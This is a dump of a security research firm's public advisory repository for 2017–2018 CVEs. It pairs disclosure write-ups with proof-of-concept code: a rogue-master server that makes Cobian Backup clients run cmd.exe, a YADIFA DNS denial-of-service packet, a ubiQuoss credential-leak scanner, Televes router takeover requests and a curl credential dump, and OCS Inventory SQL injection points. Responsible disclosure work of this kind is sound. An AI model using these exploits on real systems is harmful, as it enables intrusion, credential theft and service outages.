├── 2017
├── CVE-2017-11318
│ ├── CVE-2017-11318.py
│ └── README.md
├── CVE-2017-14339
│ └── README.md
├── CVE-2017-6530
│ └── README.md
├── CVE-2017-6531
│ └── README.md
├── CVE-2017-6532
│ └── README.md
└── CVE-2017-8892
│ └── README.md
├── 2018
├── CVE-2018-10024
│ ├── CVE-2018-10024.py
│ └── README.md
├── CVE-2018-12482
│ └── README.md
├── CVE-2018-12483
│ └── README.md
├── CVE-2018-14473
│ └── README.md
├── CVE-2018-15503
│ └── README.md
├── CVE-2018-15610
│ └── README.md
└── CVE-2018-6792
│ └── README.md
├── 2019
├── CVE-2019-10687
│ └── README.md
├── CVE-2019-12385
│ ├── CVE-2019-12385.py
│ └── README.md
├── CVE-2019-12386
│ ├── CVE-2019-12386.html
│ ├── README.md
│ └── pwn.js
├── CVE-2019-12725
│ ├── CVE-2019-12725.py
│ └── README.md
├── CVE-2019-14459
│ └── README.md
├── CVE-2019-14666
│ ├── CVE-2019-14666.py
│ └── README.md
└── CVE-2019-18956
│ ├── CVE-2019-18956.sh
│ └── README.md
├── 2020
├── CVE-2020-12606
│ └── README.md
├── CVE-2020-28657
│ └── README.md
└── CVE-2020-35577
│ └── README.md
├── 2021
├── CVE-2021-33207
│ └── README.md
├── CVE-2021-33208
│ └── README.md
├── CVE-2021-33523
│ └── README.md
└── CVE-2021-33581
│ └── README.md
├── 2022
├── CVE-2022-30977
│ └── README.md
├── CVE-2022-30978
│ └── README.md
└── CVE-2022-43216
│ └── README.md
├── 2024
└── CVE-2024-21172
│ └── Readme.md
├── LICENSE
├── README.md
└── logo.png
/2017/CVE-2017-11318/CVE-2017-11318.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2017-11318 - Remote Command Execution
4 | #
5 | # Software: Cobian Backup 11
6 | # Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
# Details: https://github.com/blackarrowsec/advisories/tree/master/2017/CVE-2017-11318
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import socket
13 | import signal
14 | import sys
15 | from thread import *
16 |
def signal_handler(signal, frame):
    """SIGINT handler: announce the interrupt and exit with status 0.

    `signal` (the signal number) and `frame` (the interrupted stack frame)
    are what the runtime hands to every handler; neither is used here.
    The first parameter keeps its original name even though it shadows the
    `signal` module inside the function body.
    """
    sys.stdout.write('You pressed Ctrl+C!\n')
    raise SystemExit(0)


signal.signal(signal.SIGINT, signal_handler)
21 |
###### Socket data
host = ''      # '' = listen on every interface; the victim client must reach us as its "master"
port = 16020 #Default port the Cobian client connects to; change it if the target uses another

###### Server Packets
# Master->client messages are UTF-16LE text.  They are kept hex-encoded here and
# turned into raw bytes with .decode("hex") right before conn.send().  Decoded:
iddle = "490044004c0045002c002c000d000a00"   # "IDLE,,\r\n"

get_options = "4700450054005f004f005000540049004f004e0053002c002c000d000a00"   # "GET_OPTIONS,,\r\n" (not used by the handler below)

password_ok = "500041005300530057004f00520044005f004f004b002c002c000d000a00"   # "PASSWORD_OK,,\r\n" - the PoC sends this to every client without checking anything
32 |
# Task definition pushed to the client: an UPDATE_LIST message whose
# "Pre backup events" field runs C:\Windows\System32\cmd.exe.  The client
# speaks UTF-16LE, so the message is kept as a list of raw byte values (the
# sending code joins them with chr()).  Written here as the text it decodes
# to, one field per line, instead of as a hex dump.  Field names and values
# (GUID, bit strings, base64 blobs) are reproduced exactly as captured; their
# meaning beyond the EXECUTE entry is not established here.
_TASK_TEXT = (
    u'UPDATE_LIST,"{11//,'
    u'Id={E7ECF42D-78E4-4248-B7EE-389536D8BD38},'
    u'Name={E7ECF42D-78E4-4248-B7EE-389536D8BD38},'
    u'Group=,Enabled=true,'
    u'""Include subdirectories=true"",'
    u'""Create separated backups=true"",'
    u'""Use attributes=true"",'
    u'""Use VSC=true"",'
    u'""Backup type=0"",'
    u'Priority=0,Source=,Destination=,'
    u'""Schedule type=1"",'
    u'""Select days of the week=false"",'
    u'""Order of Day of the week=1"",'
    u'""Day of the week=1"",'
    u'Date/Time=0100000011100100111101100010100001101000000001011000100010111110,'
    u'""Day of the month=1"",'
    u'Month=1,Timer=180,'
    u'""Timer from=0100000011100100111101100010000000000000000000000000000000000000"",'
    u'""Timer to=0100000011100100111101100011111111111111111001111011101000110111"",'
    u'""Full copies=0"",'
    u'""Differental copies=0"",'
    u'""One full every=0"",'
    u'""Use fixed day=false"",'
    u'""Fixed day=1"",'
    u'Compression=0,'
    u'""Compress individually=false"",'
    u'Split=0,'
    u'""Custom size=4300000000"",'
    u'""Comment=Cobian Backup 11 Gravity"",'
    u'Encryption=0,'
    u'Passphrase=YgBlAGAAcQB3AGsAawB7AHkAaQA5AHwABwADAA0AcwBxAHUAewAdABAAcgB+AHIAeQAEAAgAAAB4AB0AaQAJAHMAdwBoACwACQABAHUADwB+AAkAcAB7AGMAcwADAD8AfAAmAA==,'
    u'Exclusions=,Inclusions=,'
    # The payload: a pre-backup "EXECUTE" event pointing at cmd.exe.
    u'""Pre backup events=""""EXECUTE,C:\\Windows\\System32\\cmd.exe,"""""",'
    u'""Post backup events="",'
    u'""Abort if pre-event fails=false"",'
    u'""Abort if post-event fails=false"",'
    u'Mirror=false,'
    u'""Absolute paths=false"",'
    u'""Always create top directory=true"",'
    u'""Clear archive attribute=true"",'
    u'""Include backup type=true"",'
    u'""Delete empty directories=false"",'
    u'Impersonate=false,'
    u'""Abort if impersonation fails=false"",'
    u'""Run as User name="",'
    u'""Run as Domain=."",'
    u'""Run as Password=YwBiAGQAfAB6AHwAZQBiAGQAcgA4AHQAEwADAAwAcwBmAHUAaAAdAAEAcgBhAHIAaQAEAA8AAAB4AB0AbwAJAGAAdwBjACwADAABAH4AGwBpAAsAegB1AGAAaAAMADYAZwAiAA=="",'
    u'//11}",\r\n'
)
# list(bytearray(...)) yields ints on both Python 2 and 3.
task_template = list(bytearray(_TASK_TEXT.encode('utf-16-le')))
453 |
# Second message: tell the client to run the task just pushed, identified by
# the same GUID as in task_template.  The trailing "false" is reproduced as
# captured; its meaning is not established here.  Kept as a list of raw
# UTF-16LE byte values, like task_template.
execute_template = list(bytearray(
    u'BACKUP_SELECTED,{E7ECF42D-78E4-4248-B7EE-389536D8BD38},false\r\n'
    .encode('utf-16-le')))
471 |
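# Turn the byte-value tables into the raw strings conn.send() writes.  The
# original appended one chr() at a time to a growing string; a single join
# produces the same byte stream in one pass.  (Under Python 2, which this
# script targets, chr() yields a one-byte str, so the result is the exact
# UTF-16LE message.)
create_task = "".join(chr(x) for x in task_template)
execute_task = "".join(chr(x) for x in execute_template)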
480 |
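###### Client handler
def clients(conn):
    """Walk one connected Cobian client through the rogue-master exchange.

    Sequence, mirroring the captured protocol (UTF-16LE messages of the form
    "<COMMAND>,<field>,...\\r\\n"):

      1. client's first message -> answer PASSWORD_OK *without checking
         anything* (the point of the PoC: the client acts on whatever host
         answers on the master port);
      2. client ping -> UPDATE_LIST with a task whose pre-backup event is
         C:\\Windows\\System32\\cmd.exe, then IDLE;
      3. client ping -> BACKUP_SELECTED for that task, which runs the event.

    Args:
        conn: connected socket from sock.accept().  It is always closed on
            return, including when the client drops or sends a short first
            message (the original raised IndexError there and leaked the
            socket in the worker thread).
    """
    try:
        hello = conn.recv(1024).split(",")
        # The code treats field [1] as the encrypted password blob and
        # field [2] as the machine name; anything shorter is not a client
        # we know how to talk to.
        if len(hello) < 3:
            print("[-] Unexpected first message, dropping client: %r" % (hello,))
            return
        print(" -> Machine: " + hello[2])
        print(" -> Encrypted Password:\n" + hello[1])
        # No credential check of any kind: accept unconditionally.
        conn.send(password_ok.decode("hex"))

        conn.recv(1024)  # client ping; content unused
        print("[+] Creating new task...")
        conn.send(create_task)
        ack = conn.recv(1024).split(",")
        print("[+] " + ack[0])
        conn.send(iddle.decode("hex"))
        conn.recv(1024)  # client ping; content unused
        print("[+] Executing task...")
        conn.send(execute_task)
        ack = conn.recv(1024).split(",")
        print("[+] Is it OK? " + ack[0])
    finally:
        conn.close()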
500 |
501 |
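####### Main
def main():
    """Bind the fake master on (host, port) and hand each client to clients().

    An optional first CLI argument overrides the listening port (default:
    the `port` defined above, 16020).  SO_REUSEADDR is set so a quick restart
    after Ctrl+C does not fail with "Address already in use".  The listening
    socket is closed when the accept loop ends; the original placed
    sock.close() after a `while 1`, where it could never run.
    """
    listen_port = port
    if len(sys.argv) > 1:
        try:
            listen_port = int(sys.argv[1])
        except ValueError:
            print("Usage: %s [port]" % sys.argv[0])
            sys.exit(1)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        sock.bind((host, listen_port))
    except socket.error as msg:
        # str(msg) already carries errno and text; the original also indexed
        # msg[1], which itself raises for errors carrying a single argument.
        print("Error: " + str(msg))
        sys.exit(1)
    sock.listen(10)
    print("[+] Listening on %s:%d" % (host or "0.0.0.0", listen_port))

    try:
        while 1:
            conn, addr = sock.accept()
            print("[+] New client connected from " + addr[0])
            start_new_thread(clients, (conn,))
    finally:
        sock.close()


if __name__ == "__main__":
    main()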
--------------------------------------------------------------------------------
/2017/CVE-2017-11318/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-11318: Remote Command Execution in Cobian Backup
3 |
4 |
5 | __Vendor:__ CobianSoft
6 | __Vendor URL:__ https://www.cobiansoft.com
7 | __Versions affected:__ Cobian Backup 11
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ No
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2017/CVE-2017-11318/CVE-2017-11318.py))
11 |
12 |
13 |
14 |
15 | ## Summary
An attacker on the same network who can impersonate the Cobian Backup master server (for example by redirecting the client's connection to the master port, 16020 by default) can execute arbitrary commands on the client machine.
17 |
18 | ## Details
An attacker can add and execute new backup tasks when the master server is spoofed (via Man-in-the-Middle): the client acts on commands from whatever host answers as its master, so a rogue server can acknowledge the client's logon (`PASSWORD_OK`), push a task definition (`UPDATE_LIST`) whose pre-backup event is an arbitrary program — the PoC uses `C:\Windows\System32\cmd.exe` — and then trigger it (`BACKUP_SELECTED`). The commands are executed by the client through the pre-backup events defined in that new task.
20 |
21 | ## Impact
An attacker can execute arbitrary commands on the target machine; because the commands are launched by the backup client itself, no credentials for the target are required.
23 |
24 | ## Recommendation
This software has been unsupported since 2014, so this vulnerability will not be fixed. Mitigate by replacing the product or, at minimum, by restricting the clients' connections on the master port (16020 by default) to the legitimate master host and treating any other listener on that port as hostile.
26 |
27 | ## Timeline
28 |
29 | #
30 |
31 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
32 |
33 |
--------------------------------------------------------------------------------
/2017/CVE-2017-14339/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-14339: Remote Denial of Service in YadifaDNS
3 |
4 |
5 | __Vendor:__ EURid
6 | __Vendor URL:__ https://www.yadifa.eu
7 | __Versions affected:__ YadifaDNS <= 2.2.5
8 | __Discovered by:__ Javier Gil ([@ca0s_](https://twitter.com/ca0s_))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2017/CVE-2017-14339/))
11 |
12 | ## Summary
13 | The DNS packet parser in YADIFA before 2.2.6 does not check for the presence of infinite pointer loops, and thus it is possible to force it to enter an infinite loop. This can cause high CPU usage and makes the server unresponsive.
14 |
15 | ## Details
The DNS packet parser does not check for the presence of infinite pointer loops, so a crafted message can force the worker thread that parses it into an infinite loop. The number of threads processing DNS messages depends on the server's configuration, so the number of packets needed to make the server stop answering completely is not fixed: each packet sent pins one thread forever, until no more threads are available.
17 |
18 | The following is a simple PoC:
19 |
20 | ```python
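# Yadifa DoS PoC
# Discovered by: Javier Gil (@ca0s_)
#
# Sends one crafted DNS query over UDP.  Against an unpatched server each
# packet parks one worker thread for good (see Details above); 2.2.6 adds
# the missing check.  Use only against systems you are authorised to test.
import binascii
import socket
import sys

# Hex of the 38-byte datagram as captured by the author.  Reproduced
# verbatim; the 0xc00c / 0xc023 words near the end are DNS name-compression
# pointers, which is what the vulnerable parser follows without a loop check.
EXPLOIT_HEX = ("3132000000010000000001010a6b61306c6162732d000100000e10"
               "0006036e7336c00cc02300")


def build_packet():
    """Return the malicious DNS query as raw bytes."""
    return binascii.unhexlify(EXPLOIT_HEX)


def main(argv):
    """Usage: IP [PORT].  PORT defaults to 53.  Returns the process exit code."""
    if len(argv) < 2:
        print("Usage: %s IP [PORT]" % (argv[0],))
        return -1
    ip = argv[1]
    port = int(argv[2]) if len(argv) >= 3 else 53
    print("[+] Yadifa DoS PoC")
    print("[+] Sending packet...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP
    try:
        sock.sendto(build_packet(), (ip, port))
    finally:
        sock.close()  # the original never closed the socket
    print("[+] Sent!")
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))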
36 | ```
37 |
38 | ## Impact
39 | An attacker can cause a denial of service.
40 |
41 | ## Recommendation
Update to YADIFA 2.2.6 or later, which adds the missing pointer-loop check (see the timeline below).
43 |
44 | ## Timeline
45 | * 01/09/2017 – Initial contact with EURid’s security team and bug report, following a strict FD policy (Friday Disclosure)
46 | * 01/09/2017 – Got an answer from EURid, information forwarded to yadifa developers
47 | * 04/09/2017 – PoC sent to EURid
48 | * 08/09/2017 – Bug reproduced by EURid’s developers, start developing a patch
49 | * 11/09/2017 – Contact with MITRE
50 | * 12/09/2017 – CVE-2017-14339 assigned
51 | * 13/09/2017 – yadifa 2.2.6 released, bug fixed
52 |
53 | #
54 |
55 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
56 |
--------------------------------------------------------------------------------
/2017/CVE-2017-6530/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-6530: Arbitrary password change in Televes Coaxdata Gateway 1Gbps
2 |
3 | ## Software
5 |
6 | __Vendor:__ Televes
7 | __Vendor URL:__ https://www.televes.com
8 | __Versions affected:__ Televes Coaxdata Gateway 1Gbps
9 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
10 | __Public fix:__ Yes
11 | __Proof of Concept:__ No
12 |
13 | ## Summary
14 | A restricted user can modify the Admin password.
15 |
16 | ## Details
An authenticated low-privileged user can modify the Admin password with the following request (the new value is passed in the `DeviceInfo.X_ATH-COM_TeleComAccount.Password` parameter):
18 |
19 | ```
20 | http://TARGET/password.shtml?DeviceInfo.X_ATH-COM_TeleComAccount.Password=
21 | ```
22 |
23 | ## Impact
24 | This vulnerability can be exploited to do an account takeover of the admin user.
25 |
26 | ## Recommendation
27 | Update the firmware to the latest version and block access to the administration web interface from the internet or untrusted networks.
28 |
29 | ## Timeline
30 | * 27/2/2017 - Reported vulnerability to vendor
31 | * 28/2/2017 - Technical details sent on a 2nd contact attempt
32 | * 01/3/2017 - Manufacturer acknowledged the issues and stated that the restricted user would be removed from future releases
33 | * 13/7/2017 - Follow up email related to resolution. No response
34 | * 20/7/2017 - Public Disclosure
35 |
36 | #
37 |
38 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2017/CVE-2017-6531/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-6531: Unrestricted backup restore in Televes Coaxdata Gateway 1Gbps
2 | ## Software
3 | []() []() []()
4 |
5 | __Vendor:__ Televes
6 | __Vendor URL:__ https://www.televes.com
7 | __Versions affected:__ Televes Coaxdata Gateway 1Gbps
8 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 |
13 | ## Summary
14 | A restricted user can update the configuration via "backup restore" functionality.
15 |
16 | ## Details
17 | An authenticated, low-privileged user can modify the Admin password by modifying the configuration file and uploading the updated version. Steps to reproduce:
18 |
19 | 1. Update configuration file with new password
20 | ```
21 | POST /ReadFile.cgi HTTP/1.1
22 |
23 | Host:
24 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
25 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
26 | Accept-Language: en-US,en;q=0.5
27 | Referer: http:///resetrouter.shtml?DeviceInfo.AdditionalConfigVersion=default_cfg_v1.02.0014
28 | Connection: close
29 | Upgrade-Insecure-Requests: 1
30 | Content-Type: multipart/form-data; boundary=---------------------------66789582480853432558488077
31 | Content-Length: 42533
32 |
33 |
34 | -----------------------------66789582480853432558488077
35 | Content-Disposition: form-data; name="cfgfile"; filename="s"
36 | Content-Type: application/octet-stream
37 |
38 |
39 | InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d
40 |
41 |
42 | -----------------------------66789582480853432558488077
43 | Content-Disposition: form-data; name="LoadCfgFile"
44 |
45 | Load
46 | -----------------------------66789582480853432558488077--
47 |
48 | ```
49 |
50 | 2. Restore the configuration
51 |
52 | ```http:///result.shtml?method=LoadCfgFile&result=0&cfgfile=/tmp/s1488261988```
53 |
54 | 3. Reboot the device
55 |
56 | ```http:///result.shtml?method=Reboot```
57 |
58 | ## Impact
59 | This vulnerability can be exploited to do an account takeover of the admin user.
60 |
61 | ## Recommendation
62 | Update the firmware to the latest version and block access to the administration web interface from the internet or untrusted networks.
63 |
64 | ## Timeline
65 | * 27/2/2017 - Reported vulnerability to vendor
66 | * 28/2/2017 - Technical details sent on a 2nd contact attempt
67 | * 01/3/2017 - Manufacturer acknowledged the issues and stated that the restricted user would be removed from future releases
68 | * 13/7/2017 - Follow up email related to resolution. No response
69 | * 20/7/2017 - Public Disclosure
70 |
71 | #
72 |
73 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2017/CVE-2017-6532/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-6532: Backup containing cleartext credentials is accessible by restricted user in Televes Coaxdata Gateway 1Gbps
2 | ## Software
3 | []() []() []()
4 |
5 | __Vendor:__ Televes
6 | __Vendor URL:__ https://www.televes.com
7 | __Versions affected:__ Televes Coaxdata Gateway 1Gbps
8 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 | ## Summary
13 | A restricted user can download the configuration file and read the admin credentials.
14 |
15 | ## Details
16 | This issue is in fact two: the first is the lack of encryption when storing the user-provided credentials within the
17 | configuration file; the second is the lack of access control on the backup file, which should be restricted to the admin user.
18 | This means that, after logging in with the default "username" credentials, one only needs to access the URL shown below in order to
19 | find the cleartext users and passwords for WiFi, the WPS PIN value, the WAN (internet provider) account and the device Admin account:
20 |
21 | ```
22 | pandujar@fogheaven:~$ curl http://192.168.2.1/mib.db | grep -i Password
23 |
24 | InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d Changeme1 (Admin password)
25 | InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Password -m 1 -d Changeme2 (ISP Password)
26 | InternetGatewayDevice.X_ATH-COM_Account.UserPassword -m 1 -d 123456 (username password)
27 |
28 | ```
29 | ## Impact
30 | This vulnerability can be exploited to do an account takeover of the admin user.
31 |
32 | ## Recommendation
33 | Update the firmware to the latest version and block access to the administration web interface from the internet or untrusted networks.
34 |
35 | ## Timeline
36 | * 27/2/2017 - Reported vulnerability to vendor
37 | * 28/2/2017 - Technical details sent on a 2nd contact attempt
38 | * 01/3/2017 - Manufacturer acknowledged the issues and stated that the restricted user would be removed from future releases
39 | * 13/7/2017 - Follow up email related to resolution. No response
40 | * 20/7/2017 - Public Disclosure
41 | *
42 |
43 | #
44 |
45 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2017/CVE-2017-8892/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-8892: Stored XSS in OpenText TempoBox
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ OpenText
6 | __Vendor URL:__ https://www.opentext.com
7 | __Versions affected:__ OpenText TempoBox <= 10.0.3
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 |
13 | ## Summary
14 | An authenticated user can inject JavaScript code in image filenames.
15 |
16 | ## Details
17 | This vulnerability can be exploited easily by setting the name of an image to a classic XSS payload. This can be combined with the lack of the HttpOnly attribute on the "cstoken" cookie in order to leak its contents. The "cstoken" cookie is used by the TempoBox API.
18 |
19 | ## Impact
20 | This vulnerability can be exploited to do an account takeover and steal or upload files. Additionally, this vulnerability is wormable.
21 |
22 | ## Recommendation
23 | Update the software to the latest version.
24 |
25 | ## Timeline
26 | * 26/10/2016 - Reported vulnerability to vendor
27 |
28 | #
29 |
30 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
31 |
--------------------------------------------------------------------------------
/2018/CVE-2018-10024/CVE-2018-10024.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2018-10024 - Credential leak
4 | #
5 | # Software: ubiQuoss Switch VP5208A
6 | # Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/tree/master/2018/CVE-2018-10024
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import argparse
13 | import requests
14 |
15 | # Stupid banner is stupid
def banner():
    """Print the tool's banner to stdout (no return value)."""
    print("\n-=[ Ubiquoss QoS Switch - bcm_passwd tester (CVE-2018-10024) ]=-\n\n")
18 |
19 | # The pwn itself. If you enter an invalid user/pass combination, a bcm_passwd file is created
20 | # This bcm_passwd is the real passwd of the QoS device. And even better: sometimes credentials are in clear-text
21 | # Fuck logic!
22 |
def pwn(host):
    """Probe one host for the CVE-2018-10024 credential leak.

    Sends a single login attempt with the dummy credentials ``test`` /
    ``test`` and then requests ``/cgi-bin/bcm_passwd``.  The login request
    carries a fixed User-Agent marker so that the probe is easy to recognise
    in the device's web-server logs.

    Args:
        host: hostname or IP of the device under test; plain HTTP is used.

    Returns:
        The body of ``bcm_passwd`` when the device answers with HTTP 200,
        otherwise ``-1``.
    """
    print("[+] Let's pwn " + host)
    login_url = "http://{0}/cgi-bin/login.cgi".format(host)
    leak_url = "http://{0}/cgi-bin/bcm_passwd".format(host)
    dummy_credentials = {'username': 'test', 'password': 'test'}
    signature_headers = {'user-agent': 'CVE-2018-10024 Tester. Use this as signature.'}

    # Step 1: the failed login is what makes the device write the file.
    print("[+] Trying to login with test / test")
    # NOTE(review): no timeout is set on either request, so an unresponsive
    # host blocks here indefinitely.
    requests.post(login_url, data=dummy_credentials, headers=signature_headers)

    # Step 2: check whether the leaked file is now reachable.
    print("[+] Testing if bcm_passwd was created")
    response = requests.get(leak_url)
    if response.status_code != 200:
        return -1
    return response.text
35 |
36 | # Argument parser
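def _test_and_report(host, log_path, in_batch=False):
    """Run ``pwn`` against one host, print the verdict and optionally log it.

    Args:
        host: target handed straight to ``pwn``.
        log_path: file to append results to (``--log``); ``None`` disables logging.
        in_batch: when True the log entry is wrapped with the host name and a
            separator line, the format used for ``--list`` runs.
    """
    try:
        pwned = pwn(host)
    except Exception:
        # Anything pwn() raises (the message hints at connection problems) is
        # reported and the run continues with the next host; KeyboardInterrupt
        # is deliberately not swallowed any more.
        print("[-] Test failed. Is port opened?")
        return
    if pwned == -1:
        print("[-] Test failed. Not vulnerable.")
        return
    print("[+] Pwned!")
    if log_path:
        entry = "\n" + host + "\n" + pwned + "\n---------\n" if in_batch else pwned
        # Context manager: the handle is closed even if write() raises.
        with open(log_path, "a") as log_file:
            log_file.write(entry)
    print("\n" + pwned)


# Argument parser
parser = argparse.ArgumentParser(description='Ubiquoss QoS Switch - bcm_passwd tester')
parser.add_argument('--target', dest='target', help="Target IP")
parser.add_argument('--list', dest='target_file', help="File with a list of targets")
parser.add_argument('--log', dest='log', help='Optional: filename to save logs')
args = parser.parse_args()

banner()

if not args.target and not args.target_file:
    print("[-] Error: please use -h to see correct syntax")
    exit(-1)

if args.target:
    _test_and_report(args.target, args.log)

if args.target_file:
    try:
        with open(args.target_file, "r") as data:
            # Blank lines (including the one left by a trailing newline) are
            # dropped so they are not probed as empty host names.
            targets = [line.strip() for line in data if line.strip()]
    except (IOError, OSError):
        print("[-] Error: file not found or incorrect format.")
        exit(-1)
    for target in targets:
        _test_and_report(target, args.log, in_batch=True)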
86 |
--------------------------------------------------------------------------------
/2018/CVE-2018-10024/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-10024: Credential leak in file accessible by unauthenticated user in ubiQuoss Switch
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ ubiQuoss
6 | __Vendor URL:__ https://www.ubiquoss.com
7 | __Versions affected:__ ubiQuoss Switch VP5208A
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ No
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2018/CVE-2018-10024/))
11 |
12 | ## Summary
13 | An unauthenticated attacker can read system passwords in cleartext from a file accessible via HTTP.
14 |
15 | ## Details
16 | ubiQuoss Switch VP5208A creates a bcm_passwd file at /cgi-bin/ with the user credentials in cleartext when a failed login attempt occurs. The file can be reached via an HTTP request. The credentials can be used to access the system via SSH (or TELNET if it is enabled).
17 |
18 | ## Impact
19 | An attacker can read the administrator password and use it to log in to the administration interfaces (HTTP, SSH or Telnet if enabled).
20 |
21 | ## Recommendation
22 | There is no fix for this vulnerability. Block access to the administration interfaces from the internet or untrusted networks.
23 |
24 | ## Timeline
25 | * 18/09/17 - First attempt to contact vendor
26 | * 06/03/18 - Contacted US-CERT with the report
27 | * 15/03/18 - ACK from US-CERT. They gave us other e-mail address to try to contact
28 | * 15/03/18 - Attempt to contact vendor at the new e-mail address
29 | * 09/04/18 - Disclosure
30 |
31 |
32 |
33 | #
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
36 |
37 |
--------------------------------------------------------------------------------
/2018/CVE-2018-12482/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-12482: Multiple SQL injections in OCS Inventory
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ OCS Inventory
6 | __Vendor URL:__ https://ocsinventory-ng.org
7 | __Versions affected:__ OCS Inventory <= 2.4.1
8 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/Xassiz)), Jaume Llopis ([@JKS___](https://twitter.com/JKS___)) & Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 |
13 | ## Summary
14 | The search engine implemented in OCS Inventory does not perform an adequate filtering of the parameters used within SQL statements, making it possible to inject arbitrary SQL code.
15 |
16 | ## Details
17 | Some injection points:
18 |
19 | * GET and POST parameter “values” when searching from the section “Inventory -> Search with various criteria data”. When you select a search tag (for example “Network: IPADDRESS”), the SQL statement remains such that:
20 | ```
21 | select distinct HARDWARE_ID,networks.DESCRIPTION as 'Network: Description',networks.TYPE as 'Network: Type',networks.TYPEMIB as 'Network: MibType',networks.SPEED as 'Network: Speed',networks.MACADDR as 'Network: MAC Address',networks.STATUS as 'Network: Status',networks.IPADDRESS as 'Network: IP Address',networks.IPMASK as 'Network: IP Netmask',networks.IPSUBNET as 'Network: Subnetwork IP',networks.IPGATEWAY as 'Network: Gateway IP',networks.IPDHCP as 'Network: DHCP IP' from networks where ( ( IPADDRESS = '[INJECT HERE]'))
22 | ```
23 |
24 | Because the input is not filtered properly, the statement can be broken with a single quote (') and a payload injected.
25 |
26 | * Parameters length, order and start. These parameters, used for the limit and order clauses of the SQL statement, are not filtered properly, allowing arbitrary queries to be executed in the same way:
27 | ```
28 | (Example: POST parameter length)
29 | ... GROUP BY netid) non_ident on non_ident.RSX=inv.RSX) toto order by ID asc limit 0 ,[inject here]
30 | ```
31 | ## Impact
32 | An attacker can execute arbitrary SQL queries in the backend.
33 |
34 | ## Recommendation
35 | Update the software to the latest version.
36 |
37 | ## Timeline
38 |
39 | * 05/06/2018 - Reported vulnerability to vendor
40 | * 05/06/2018 - Vendor ACK
41 | * 14/06/2018 - First fix attempt (bypassed)
42 | * 02/07/2018 - Correct fix
43 | * 30/07/2018 - Security Release with fix (OCS Inventory 2.5)
44 |
45 |
46 | #
47 |
48 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
49 |
--------------------------------------------------------------------------------
/2018/CVE-2018-12483/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-12483: Remote Command Execution in OCS Inventory
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ OCS Inventory
6 | __Vendor URL:__ https://ocsinventory-ng.org
7 | __Versions affected:__ OCS Inventory <= 2.4.1
8 | __Discovered by:__ Jaume Llopis ([@JKS___](https://twitter.com/JKS___))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 | ## Summary
13 | An authenticated attacker can execute system commands via command injection in IP Discover functionality.
14 |
15 | ## Details
16 | In IP Discovery functionality:
17 | ```php
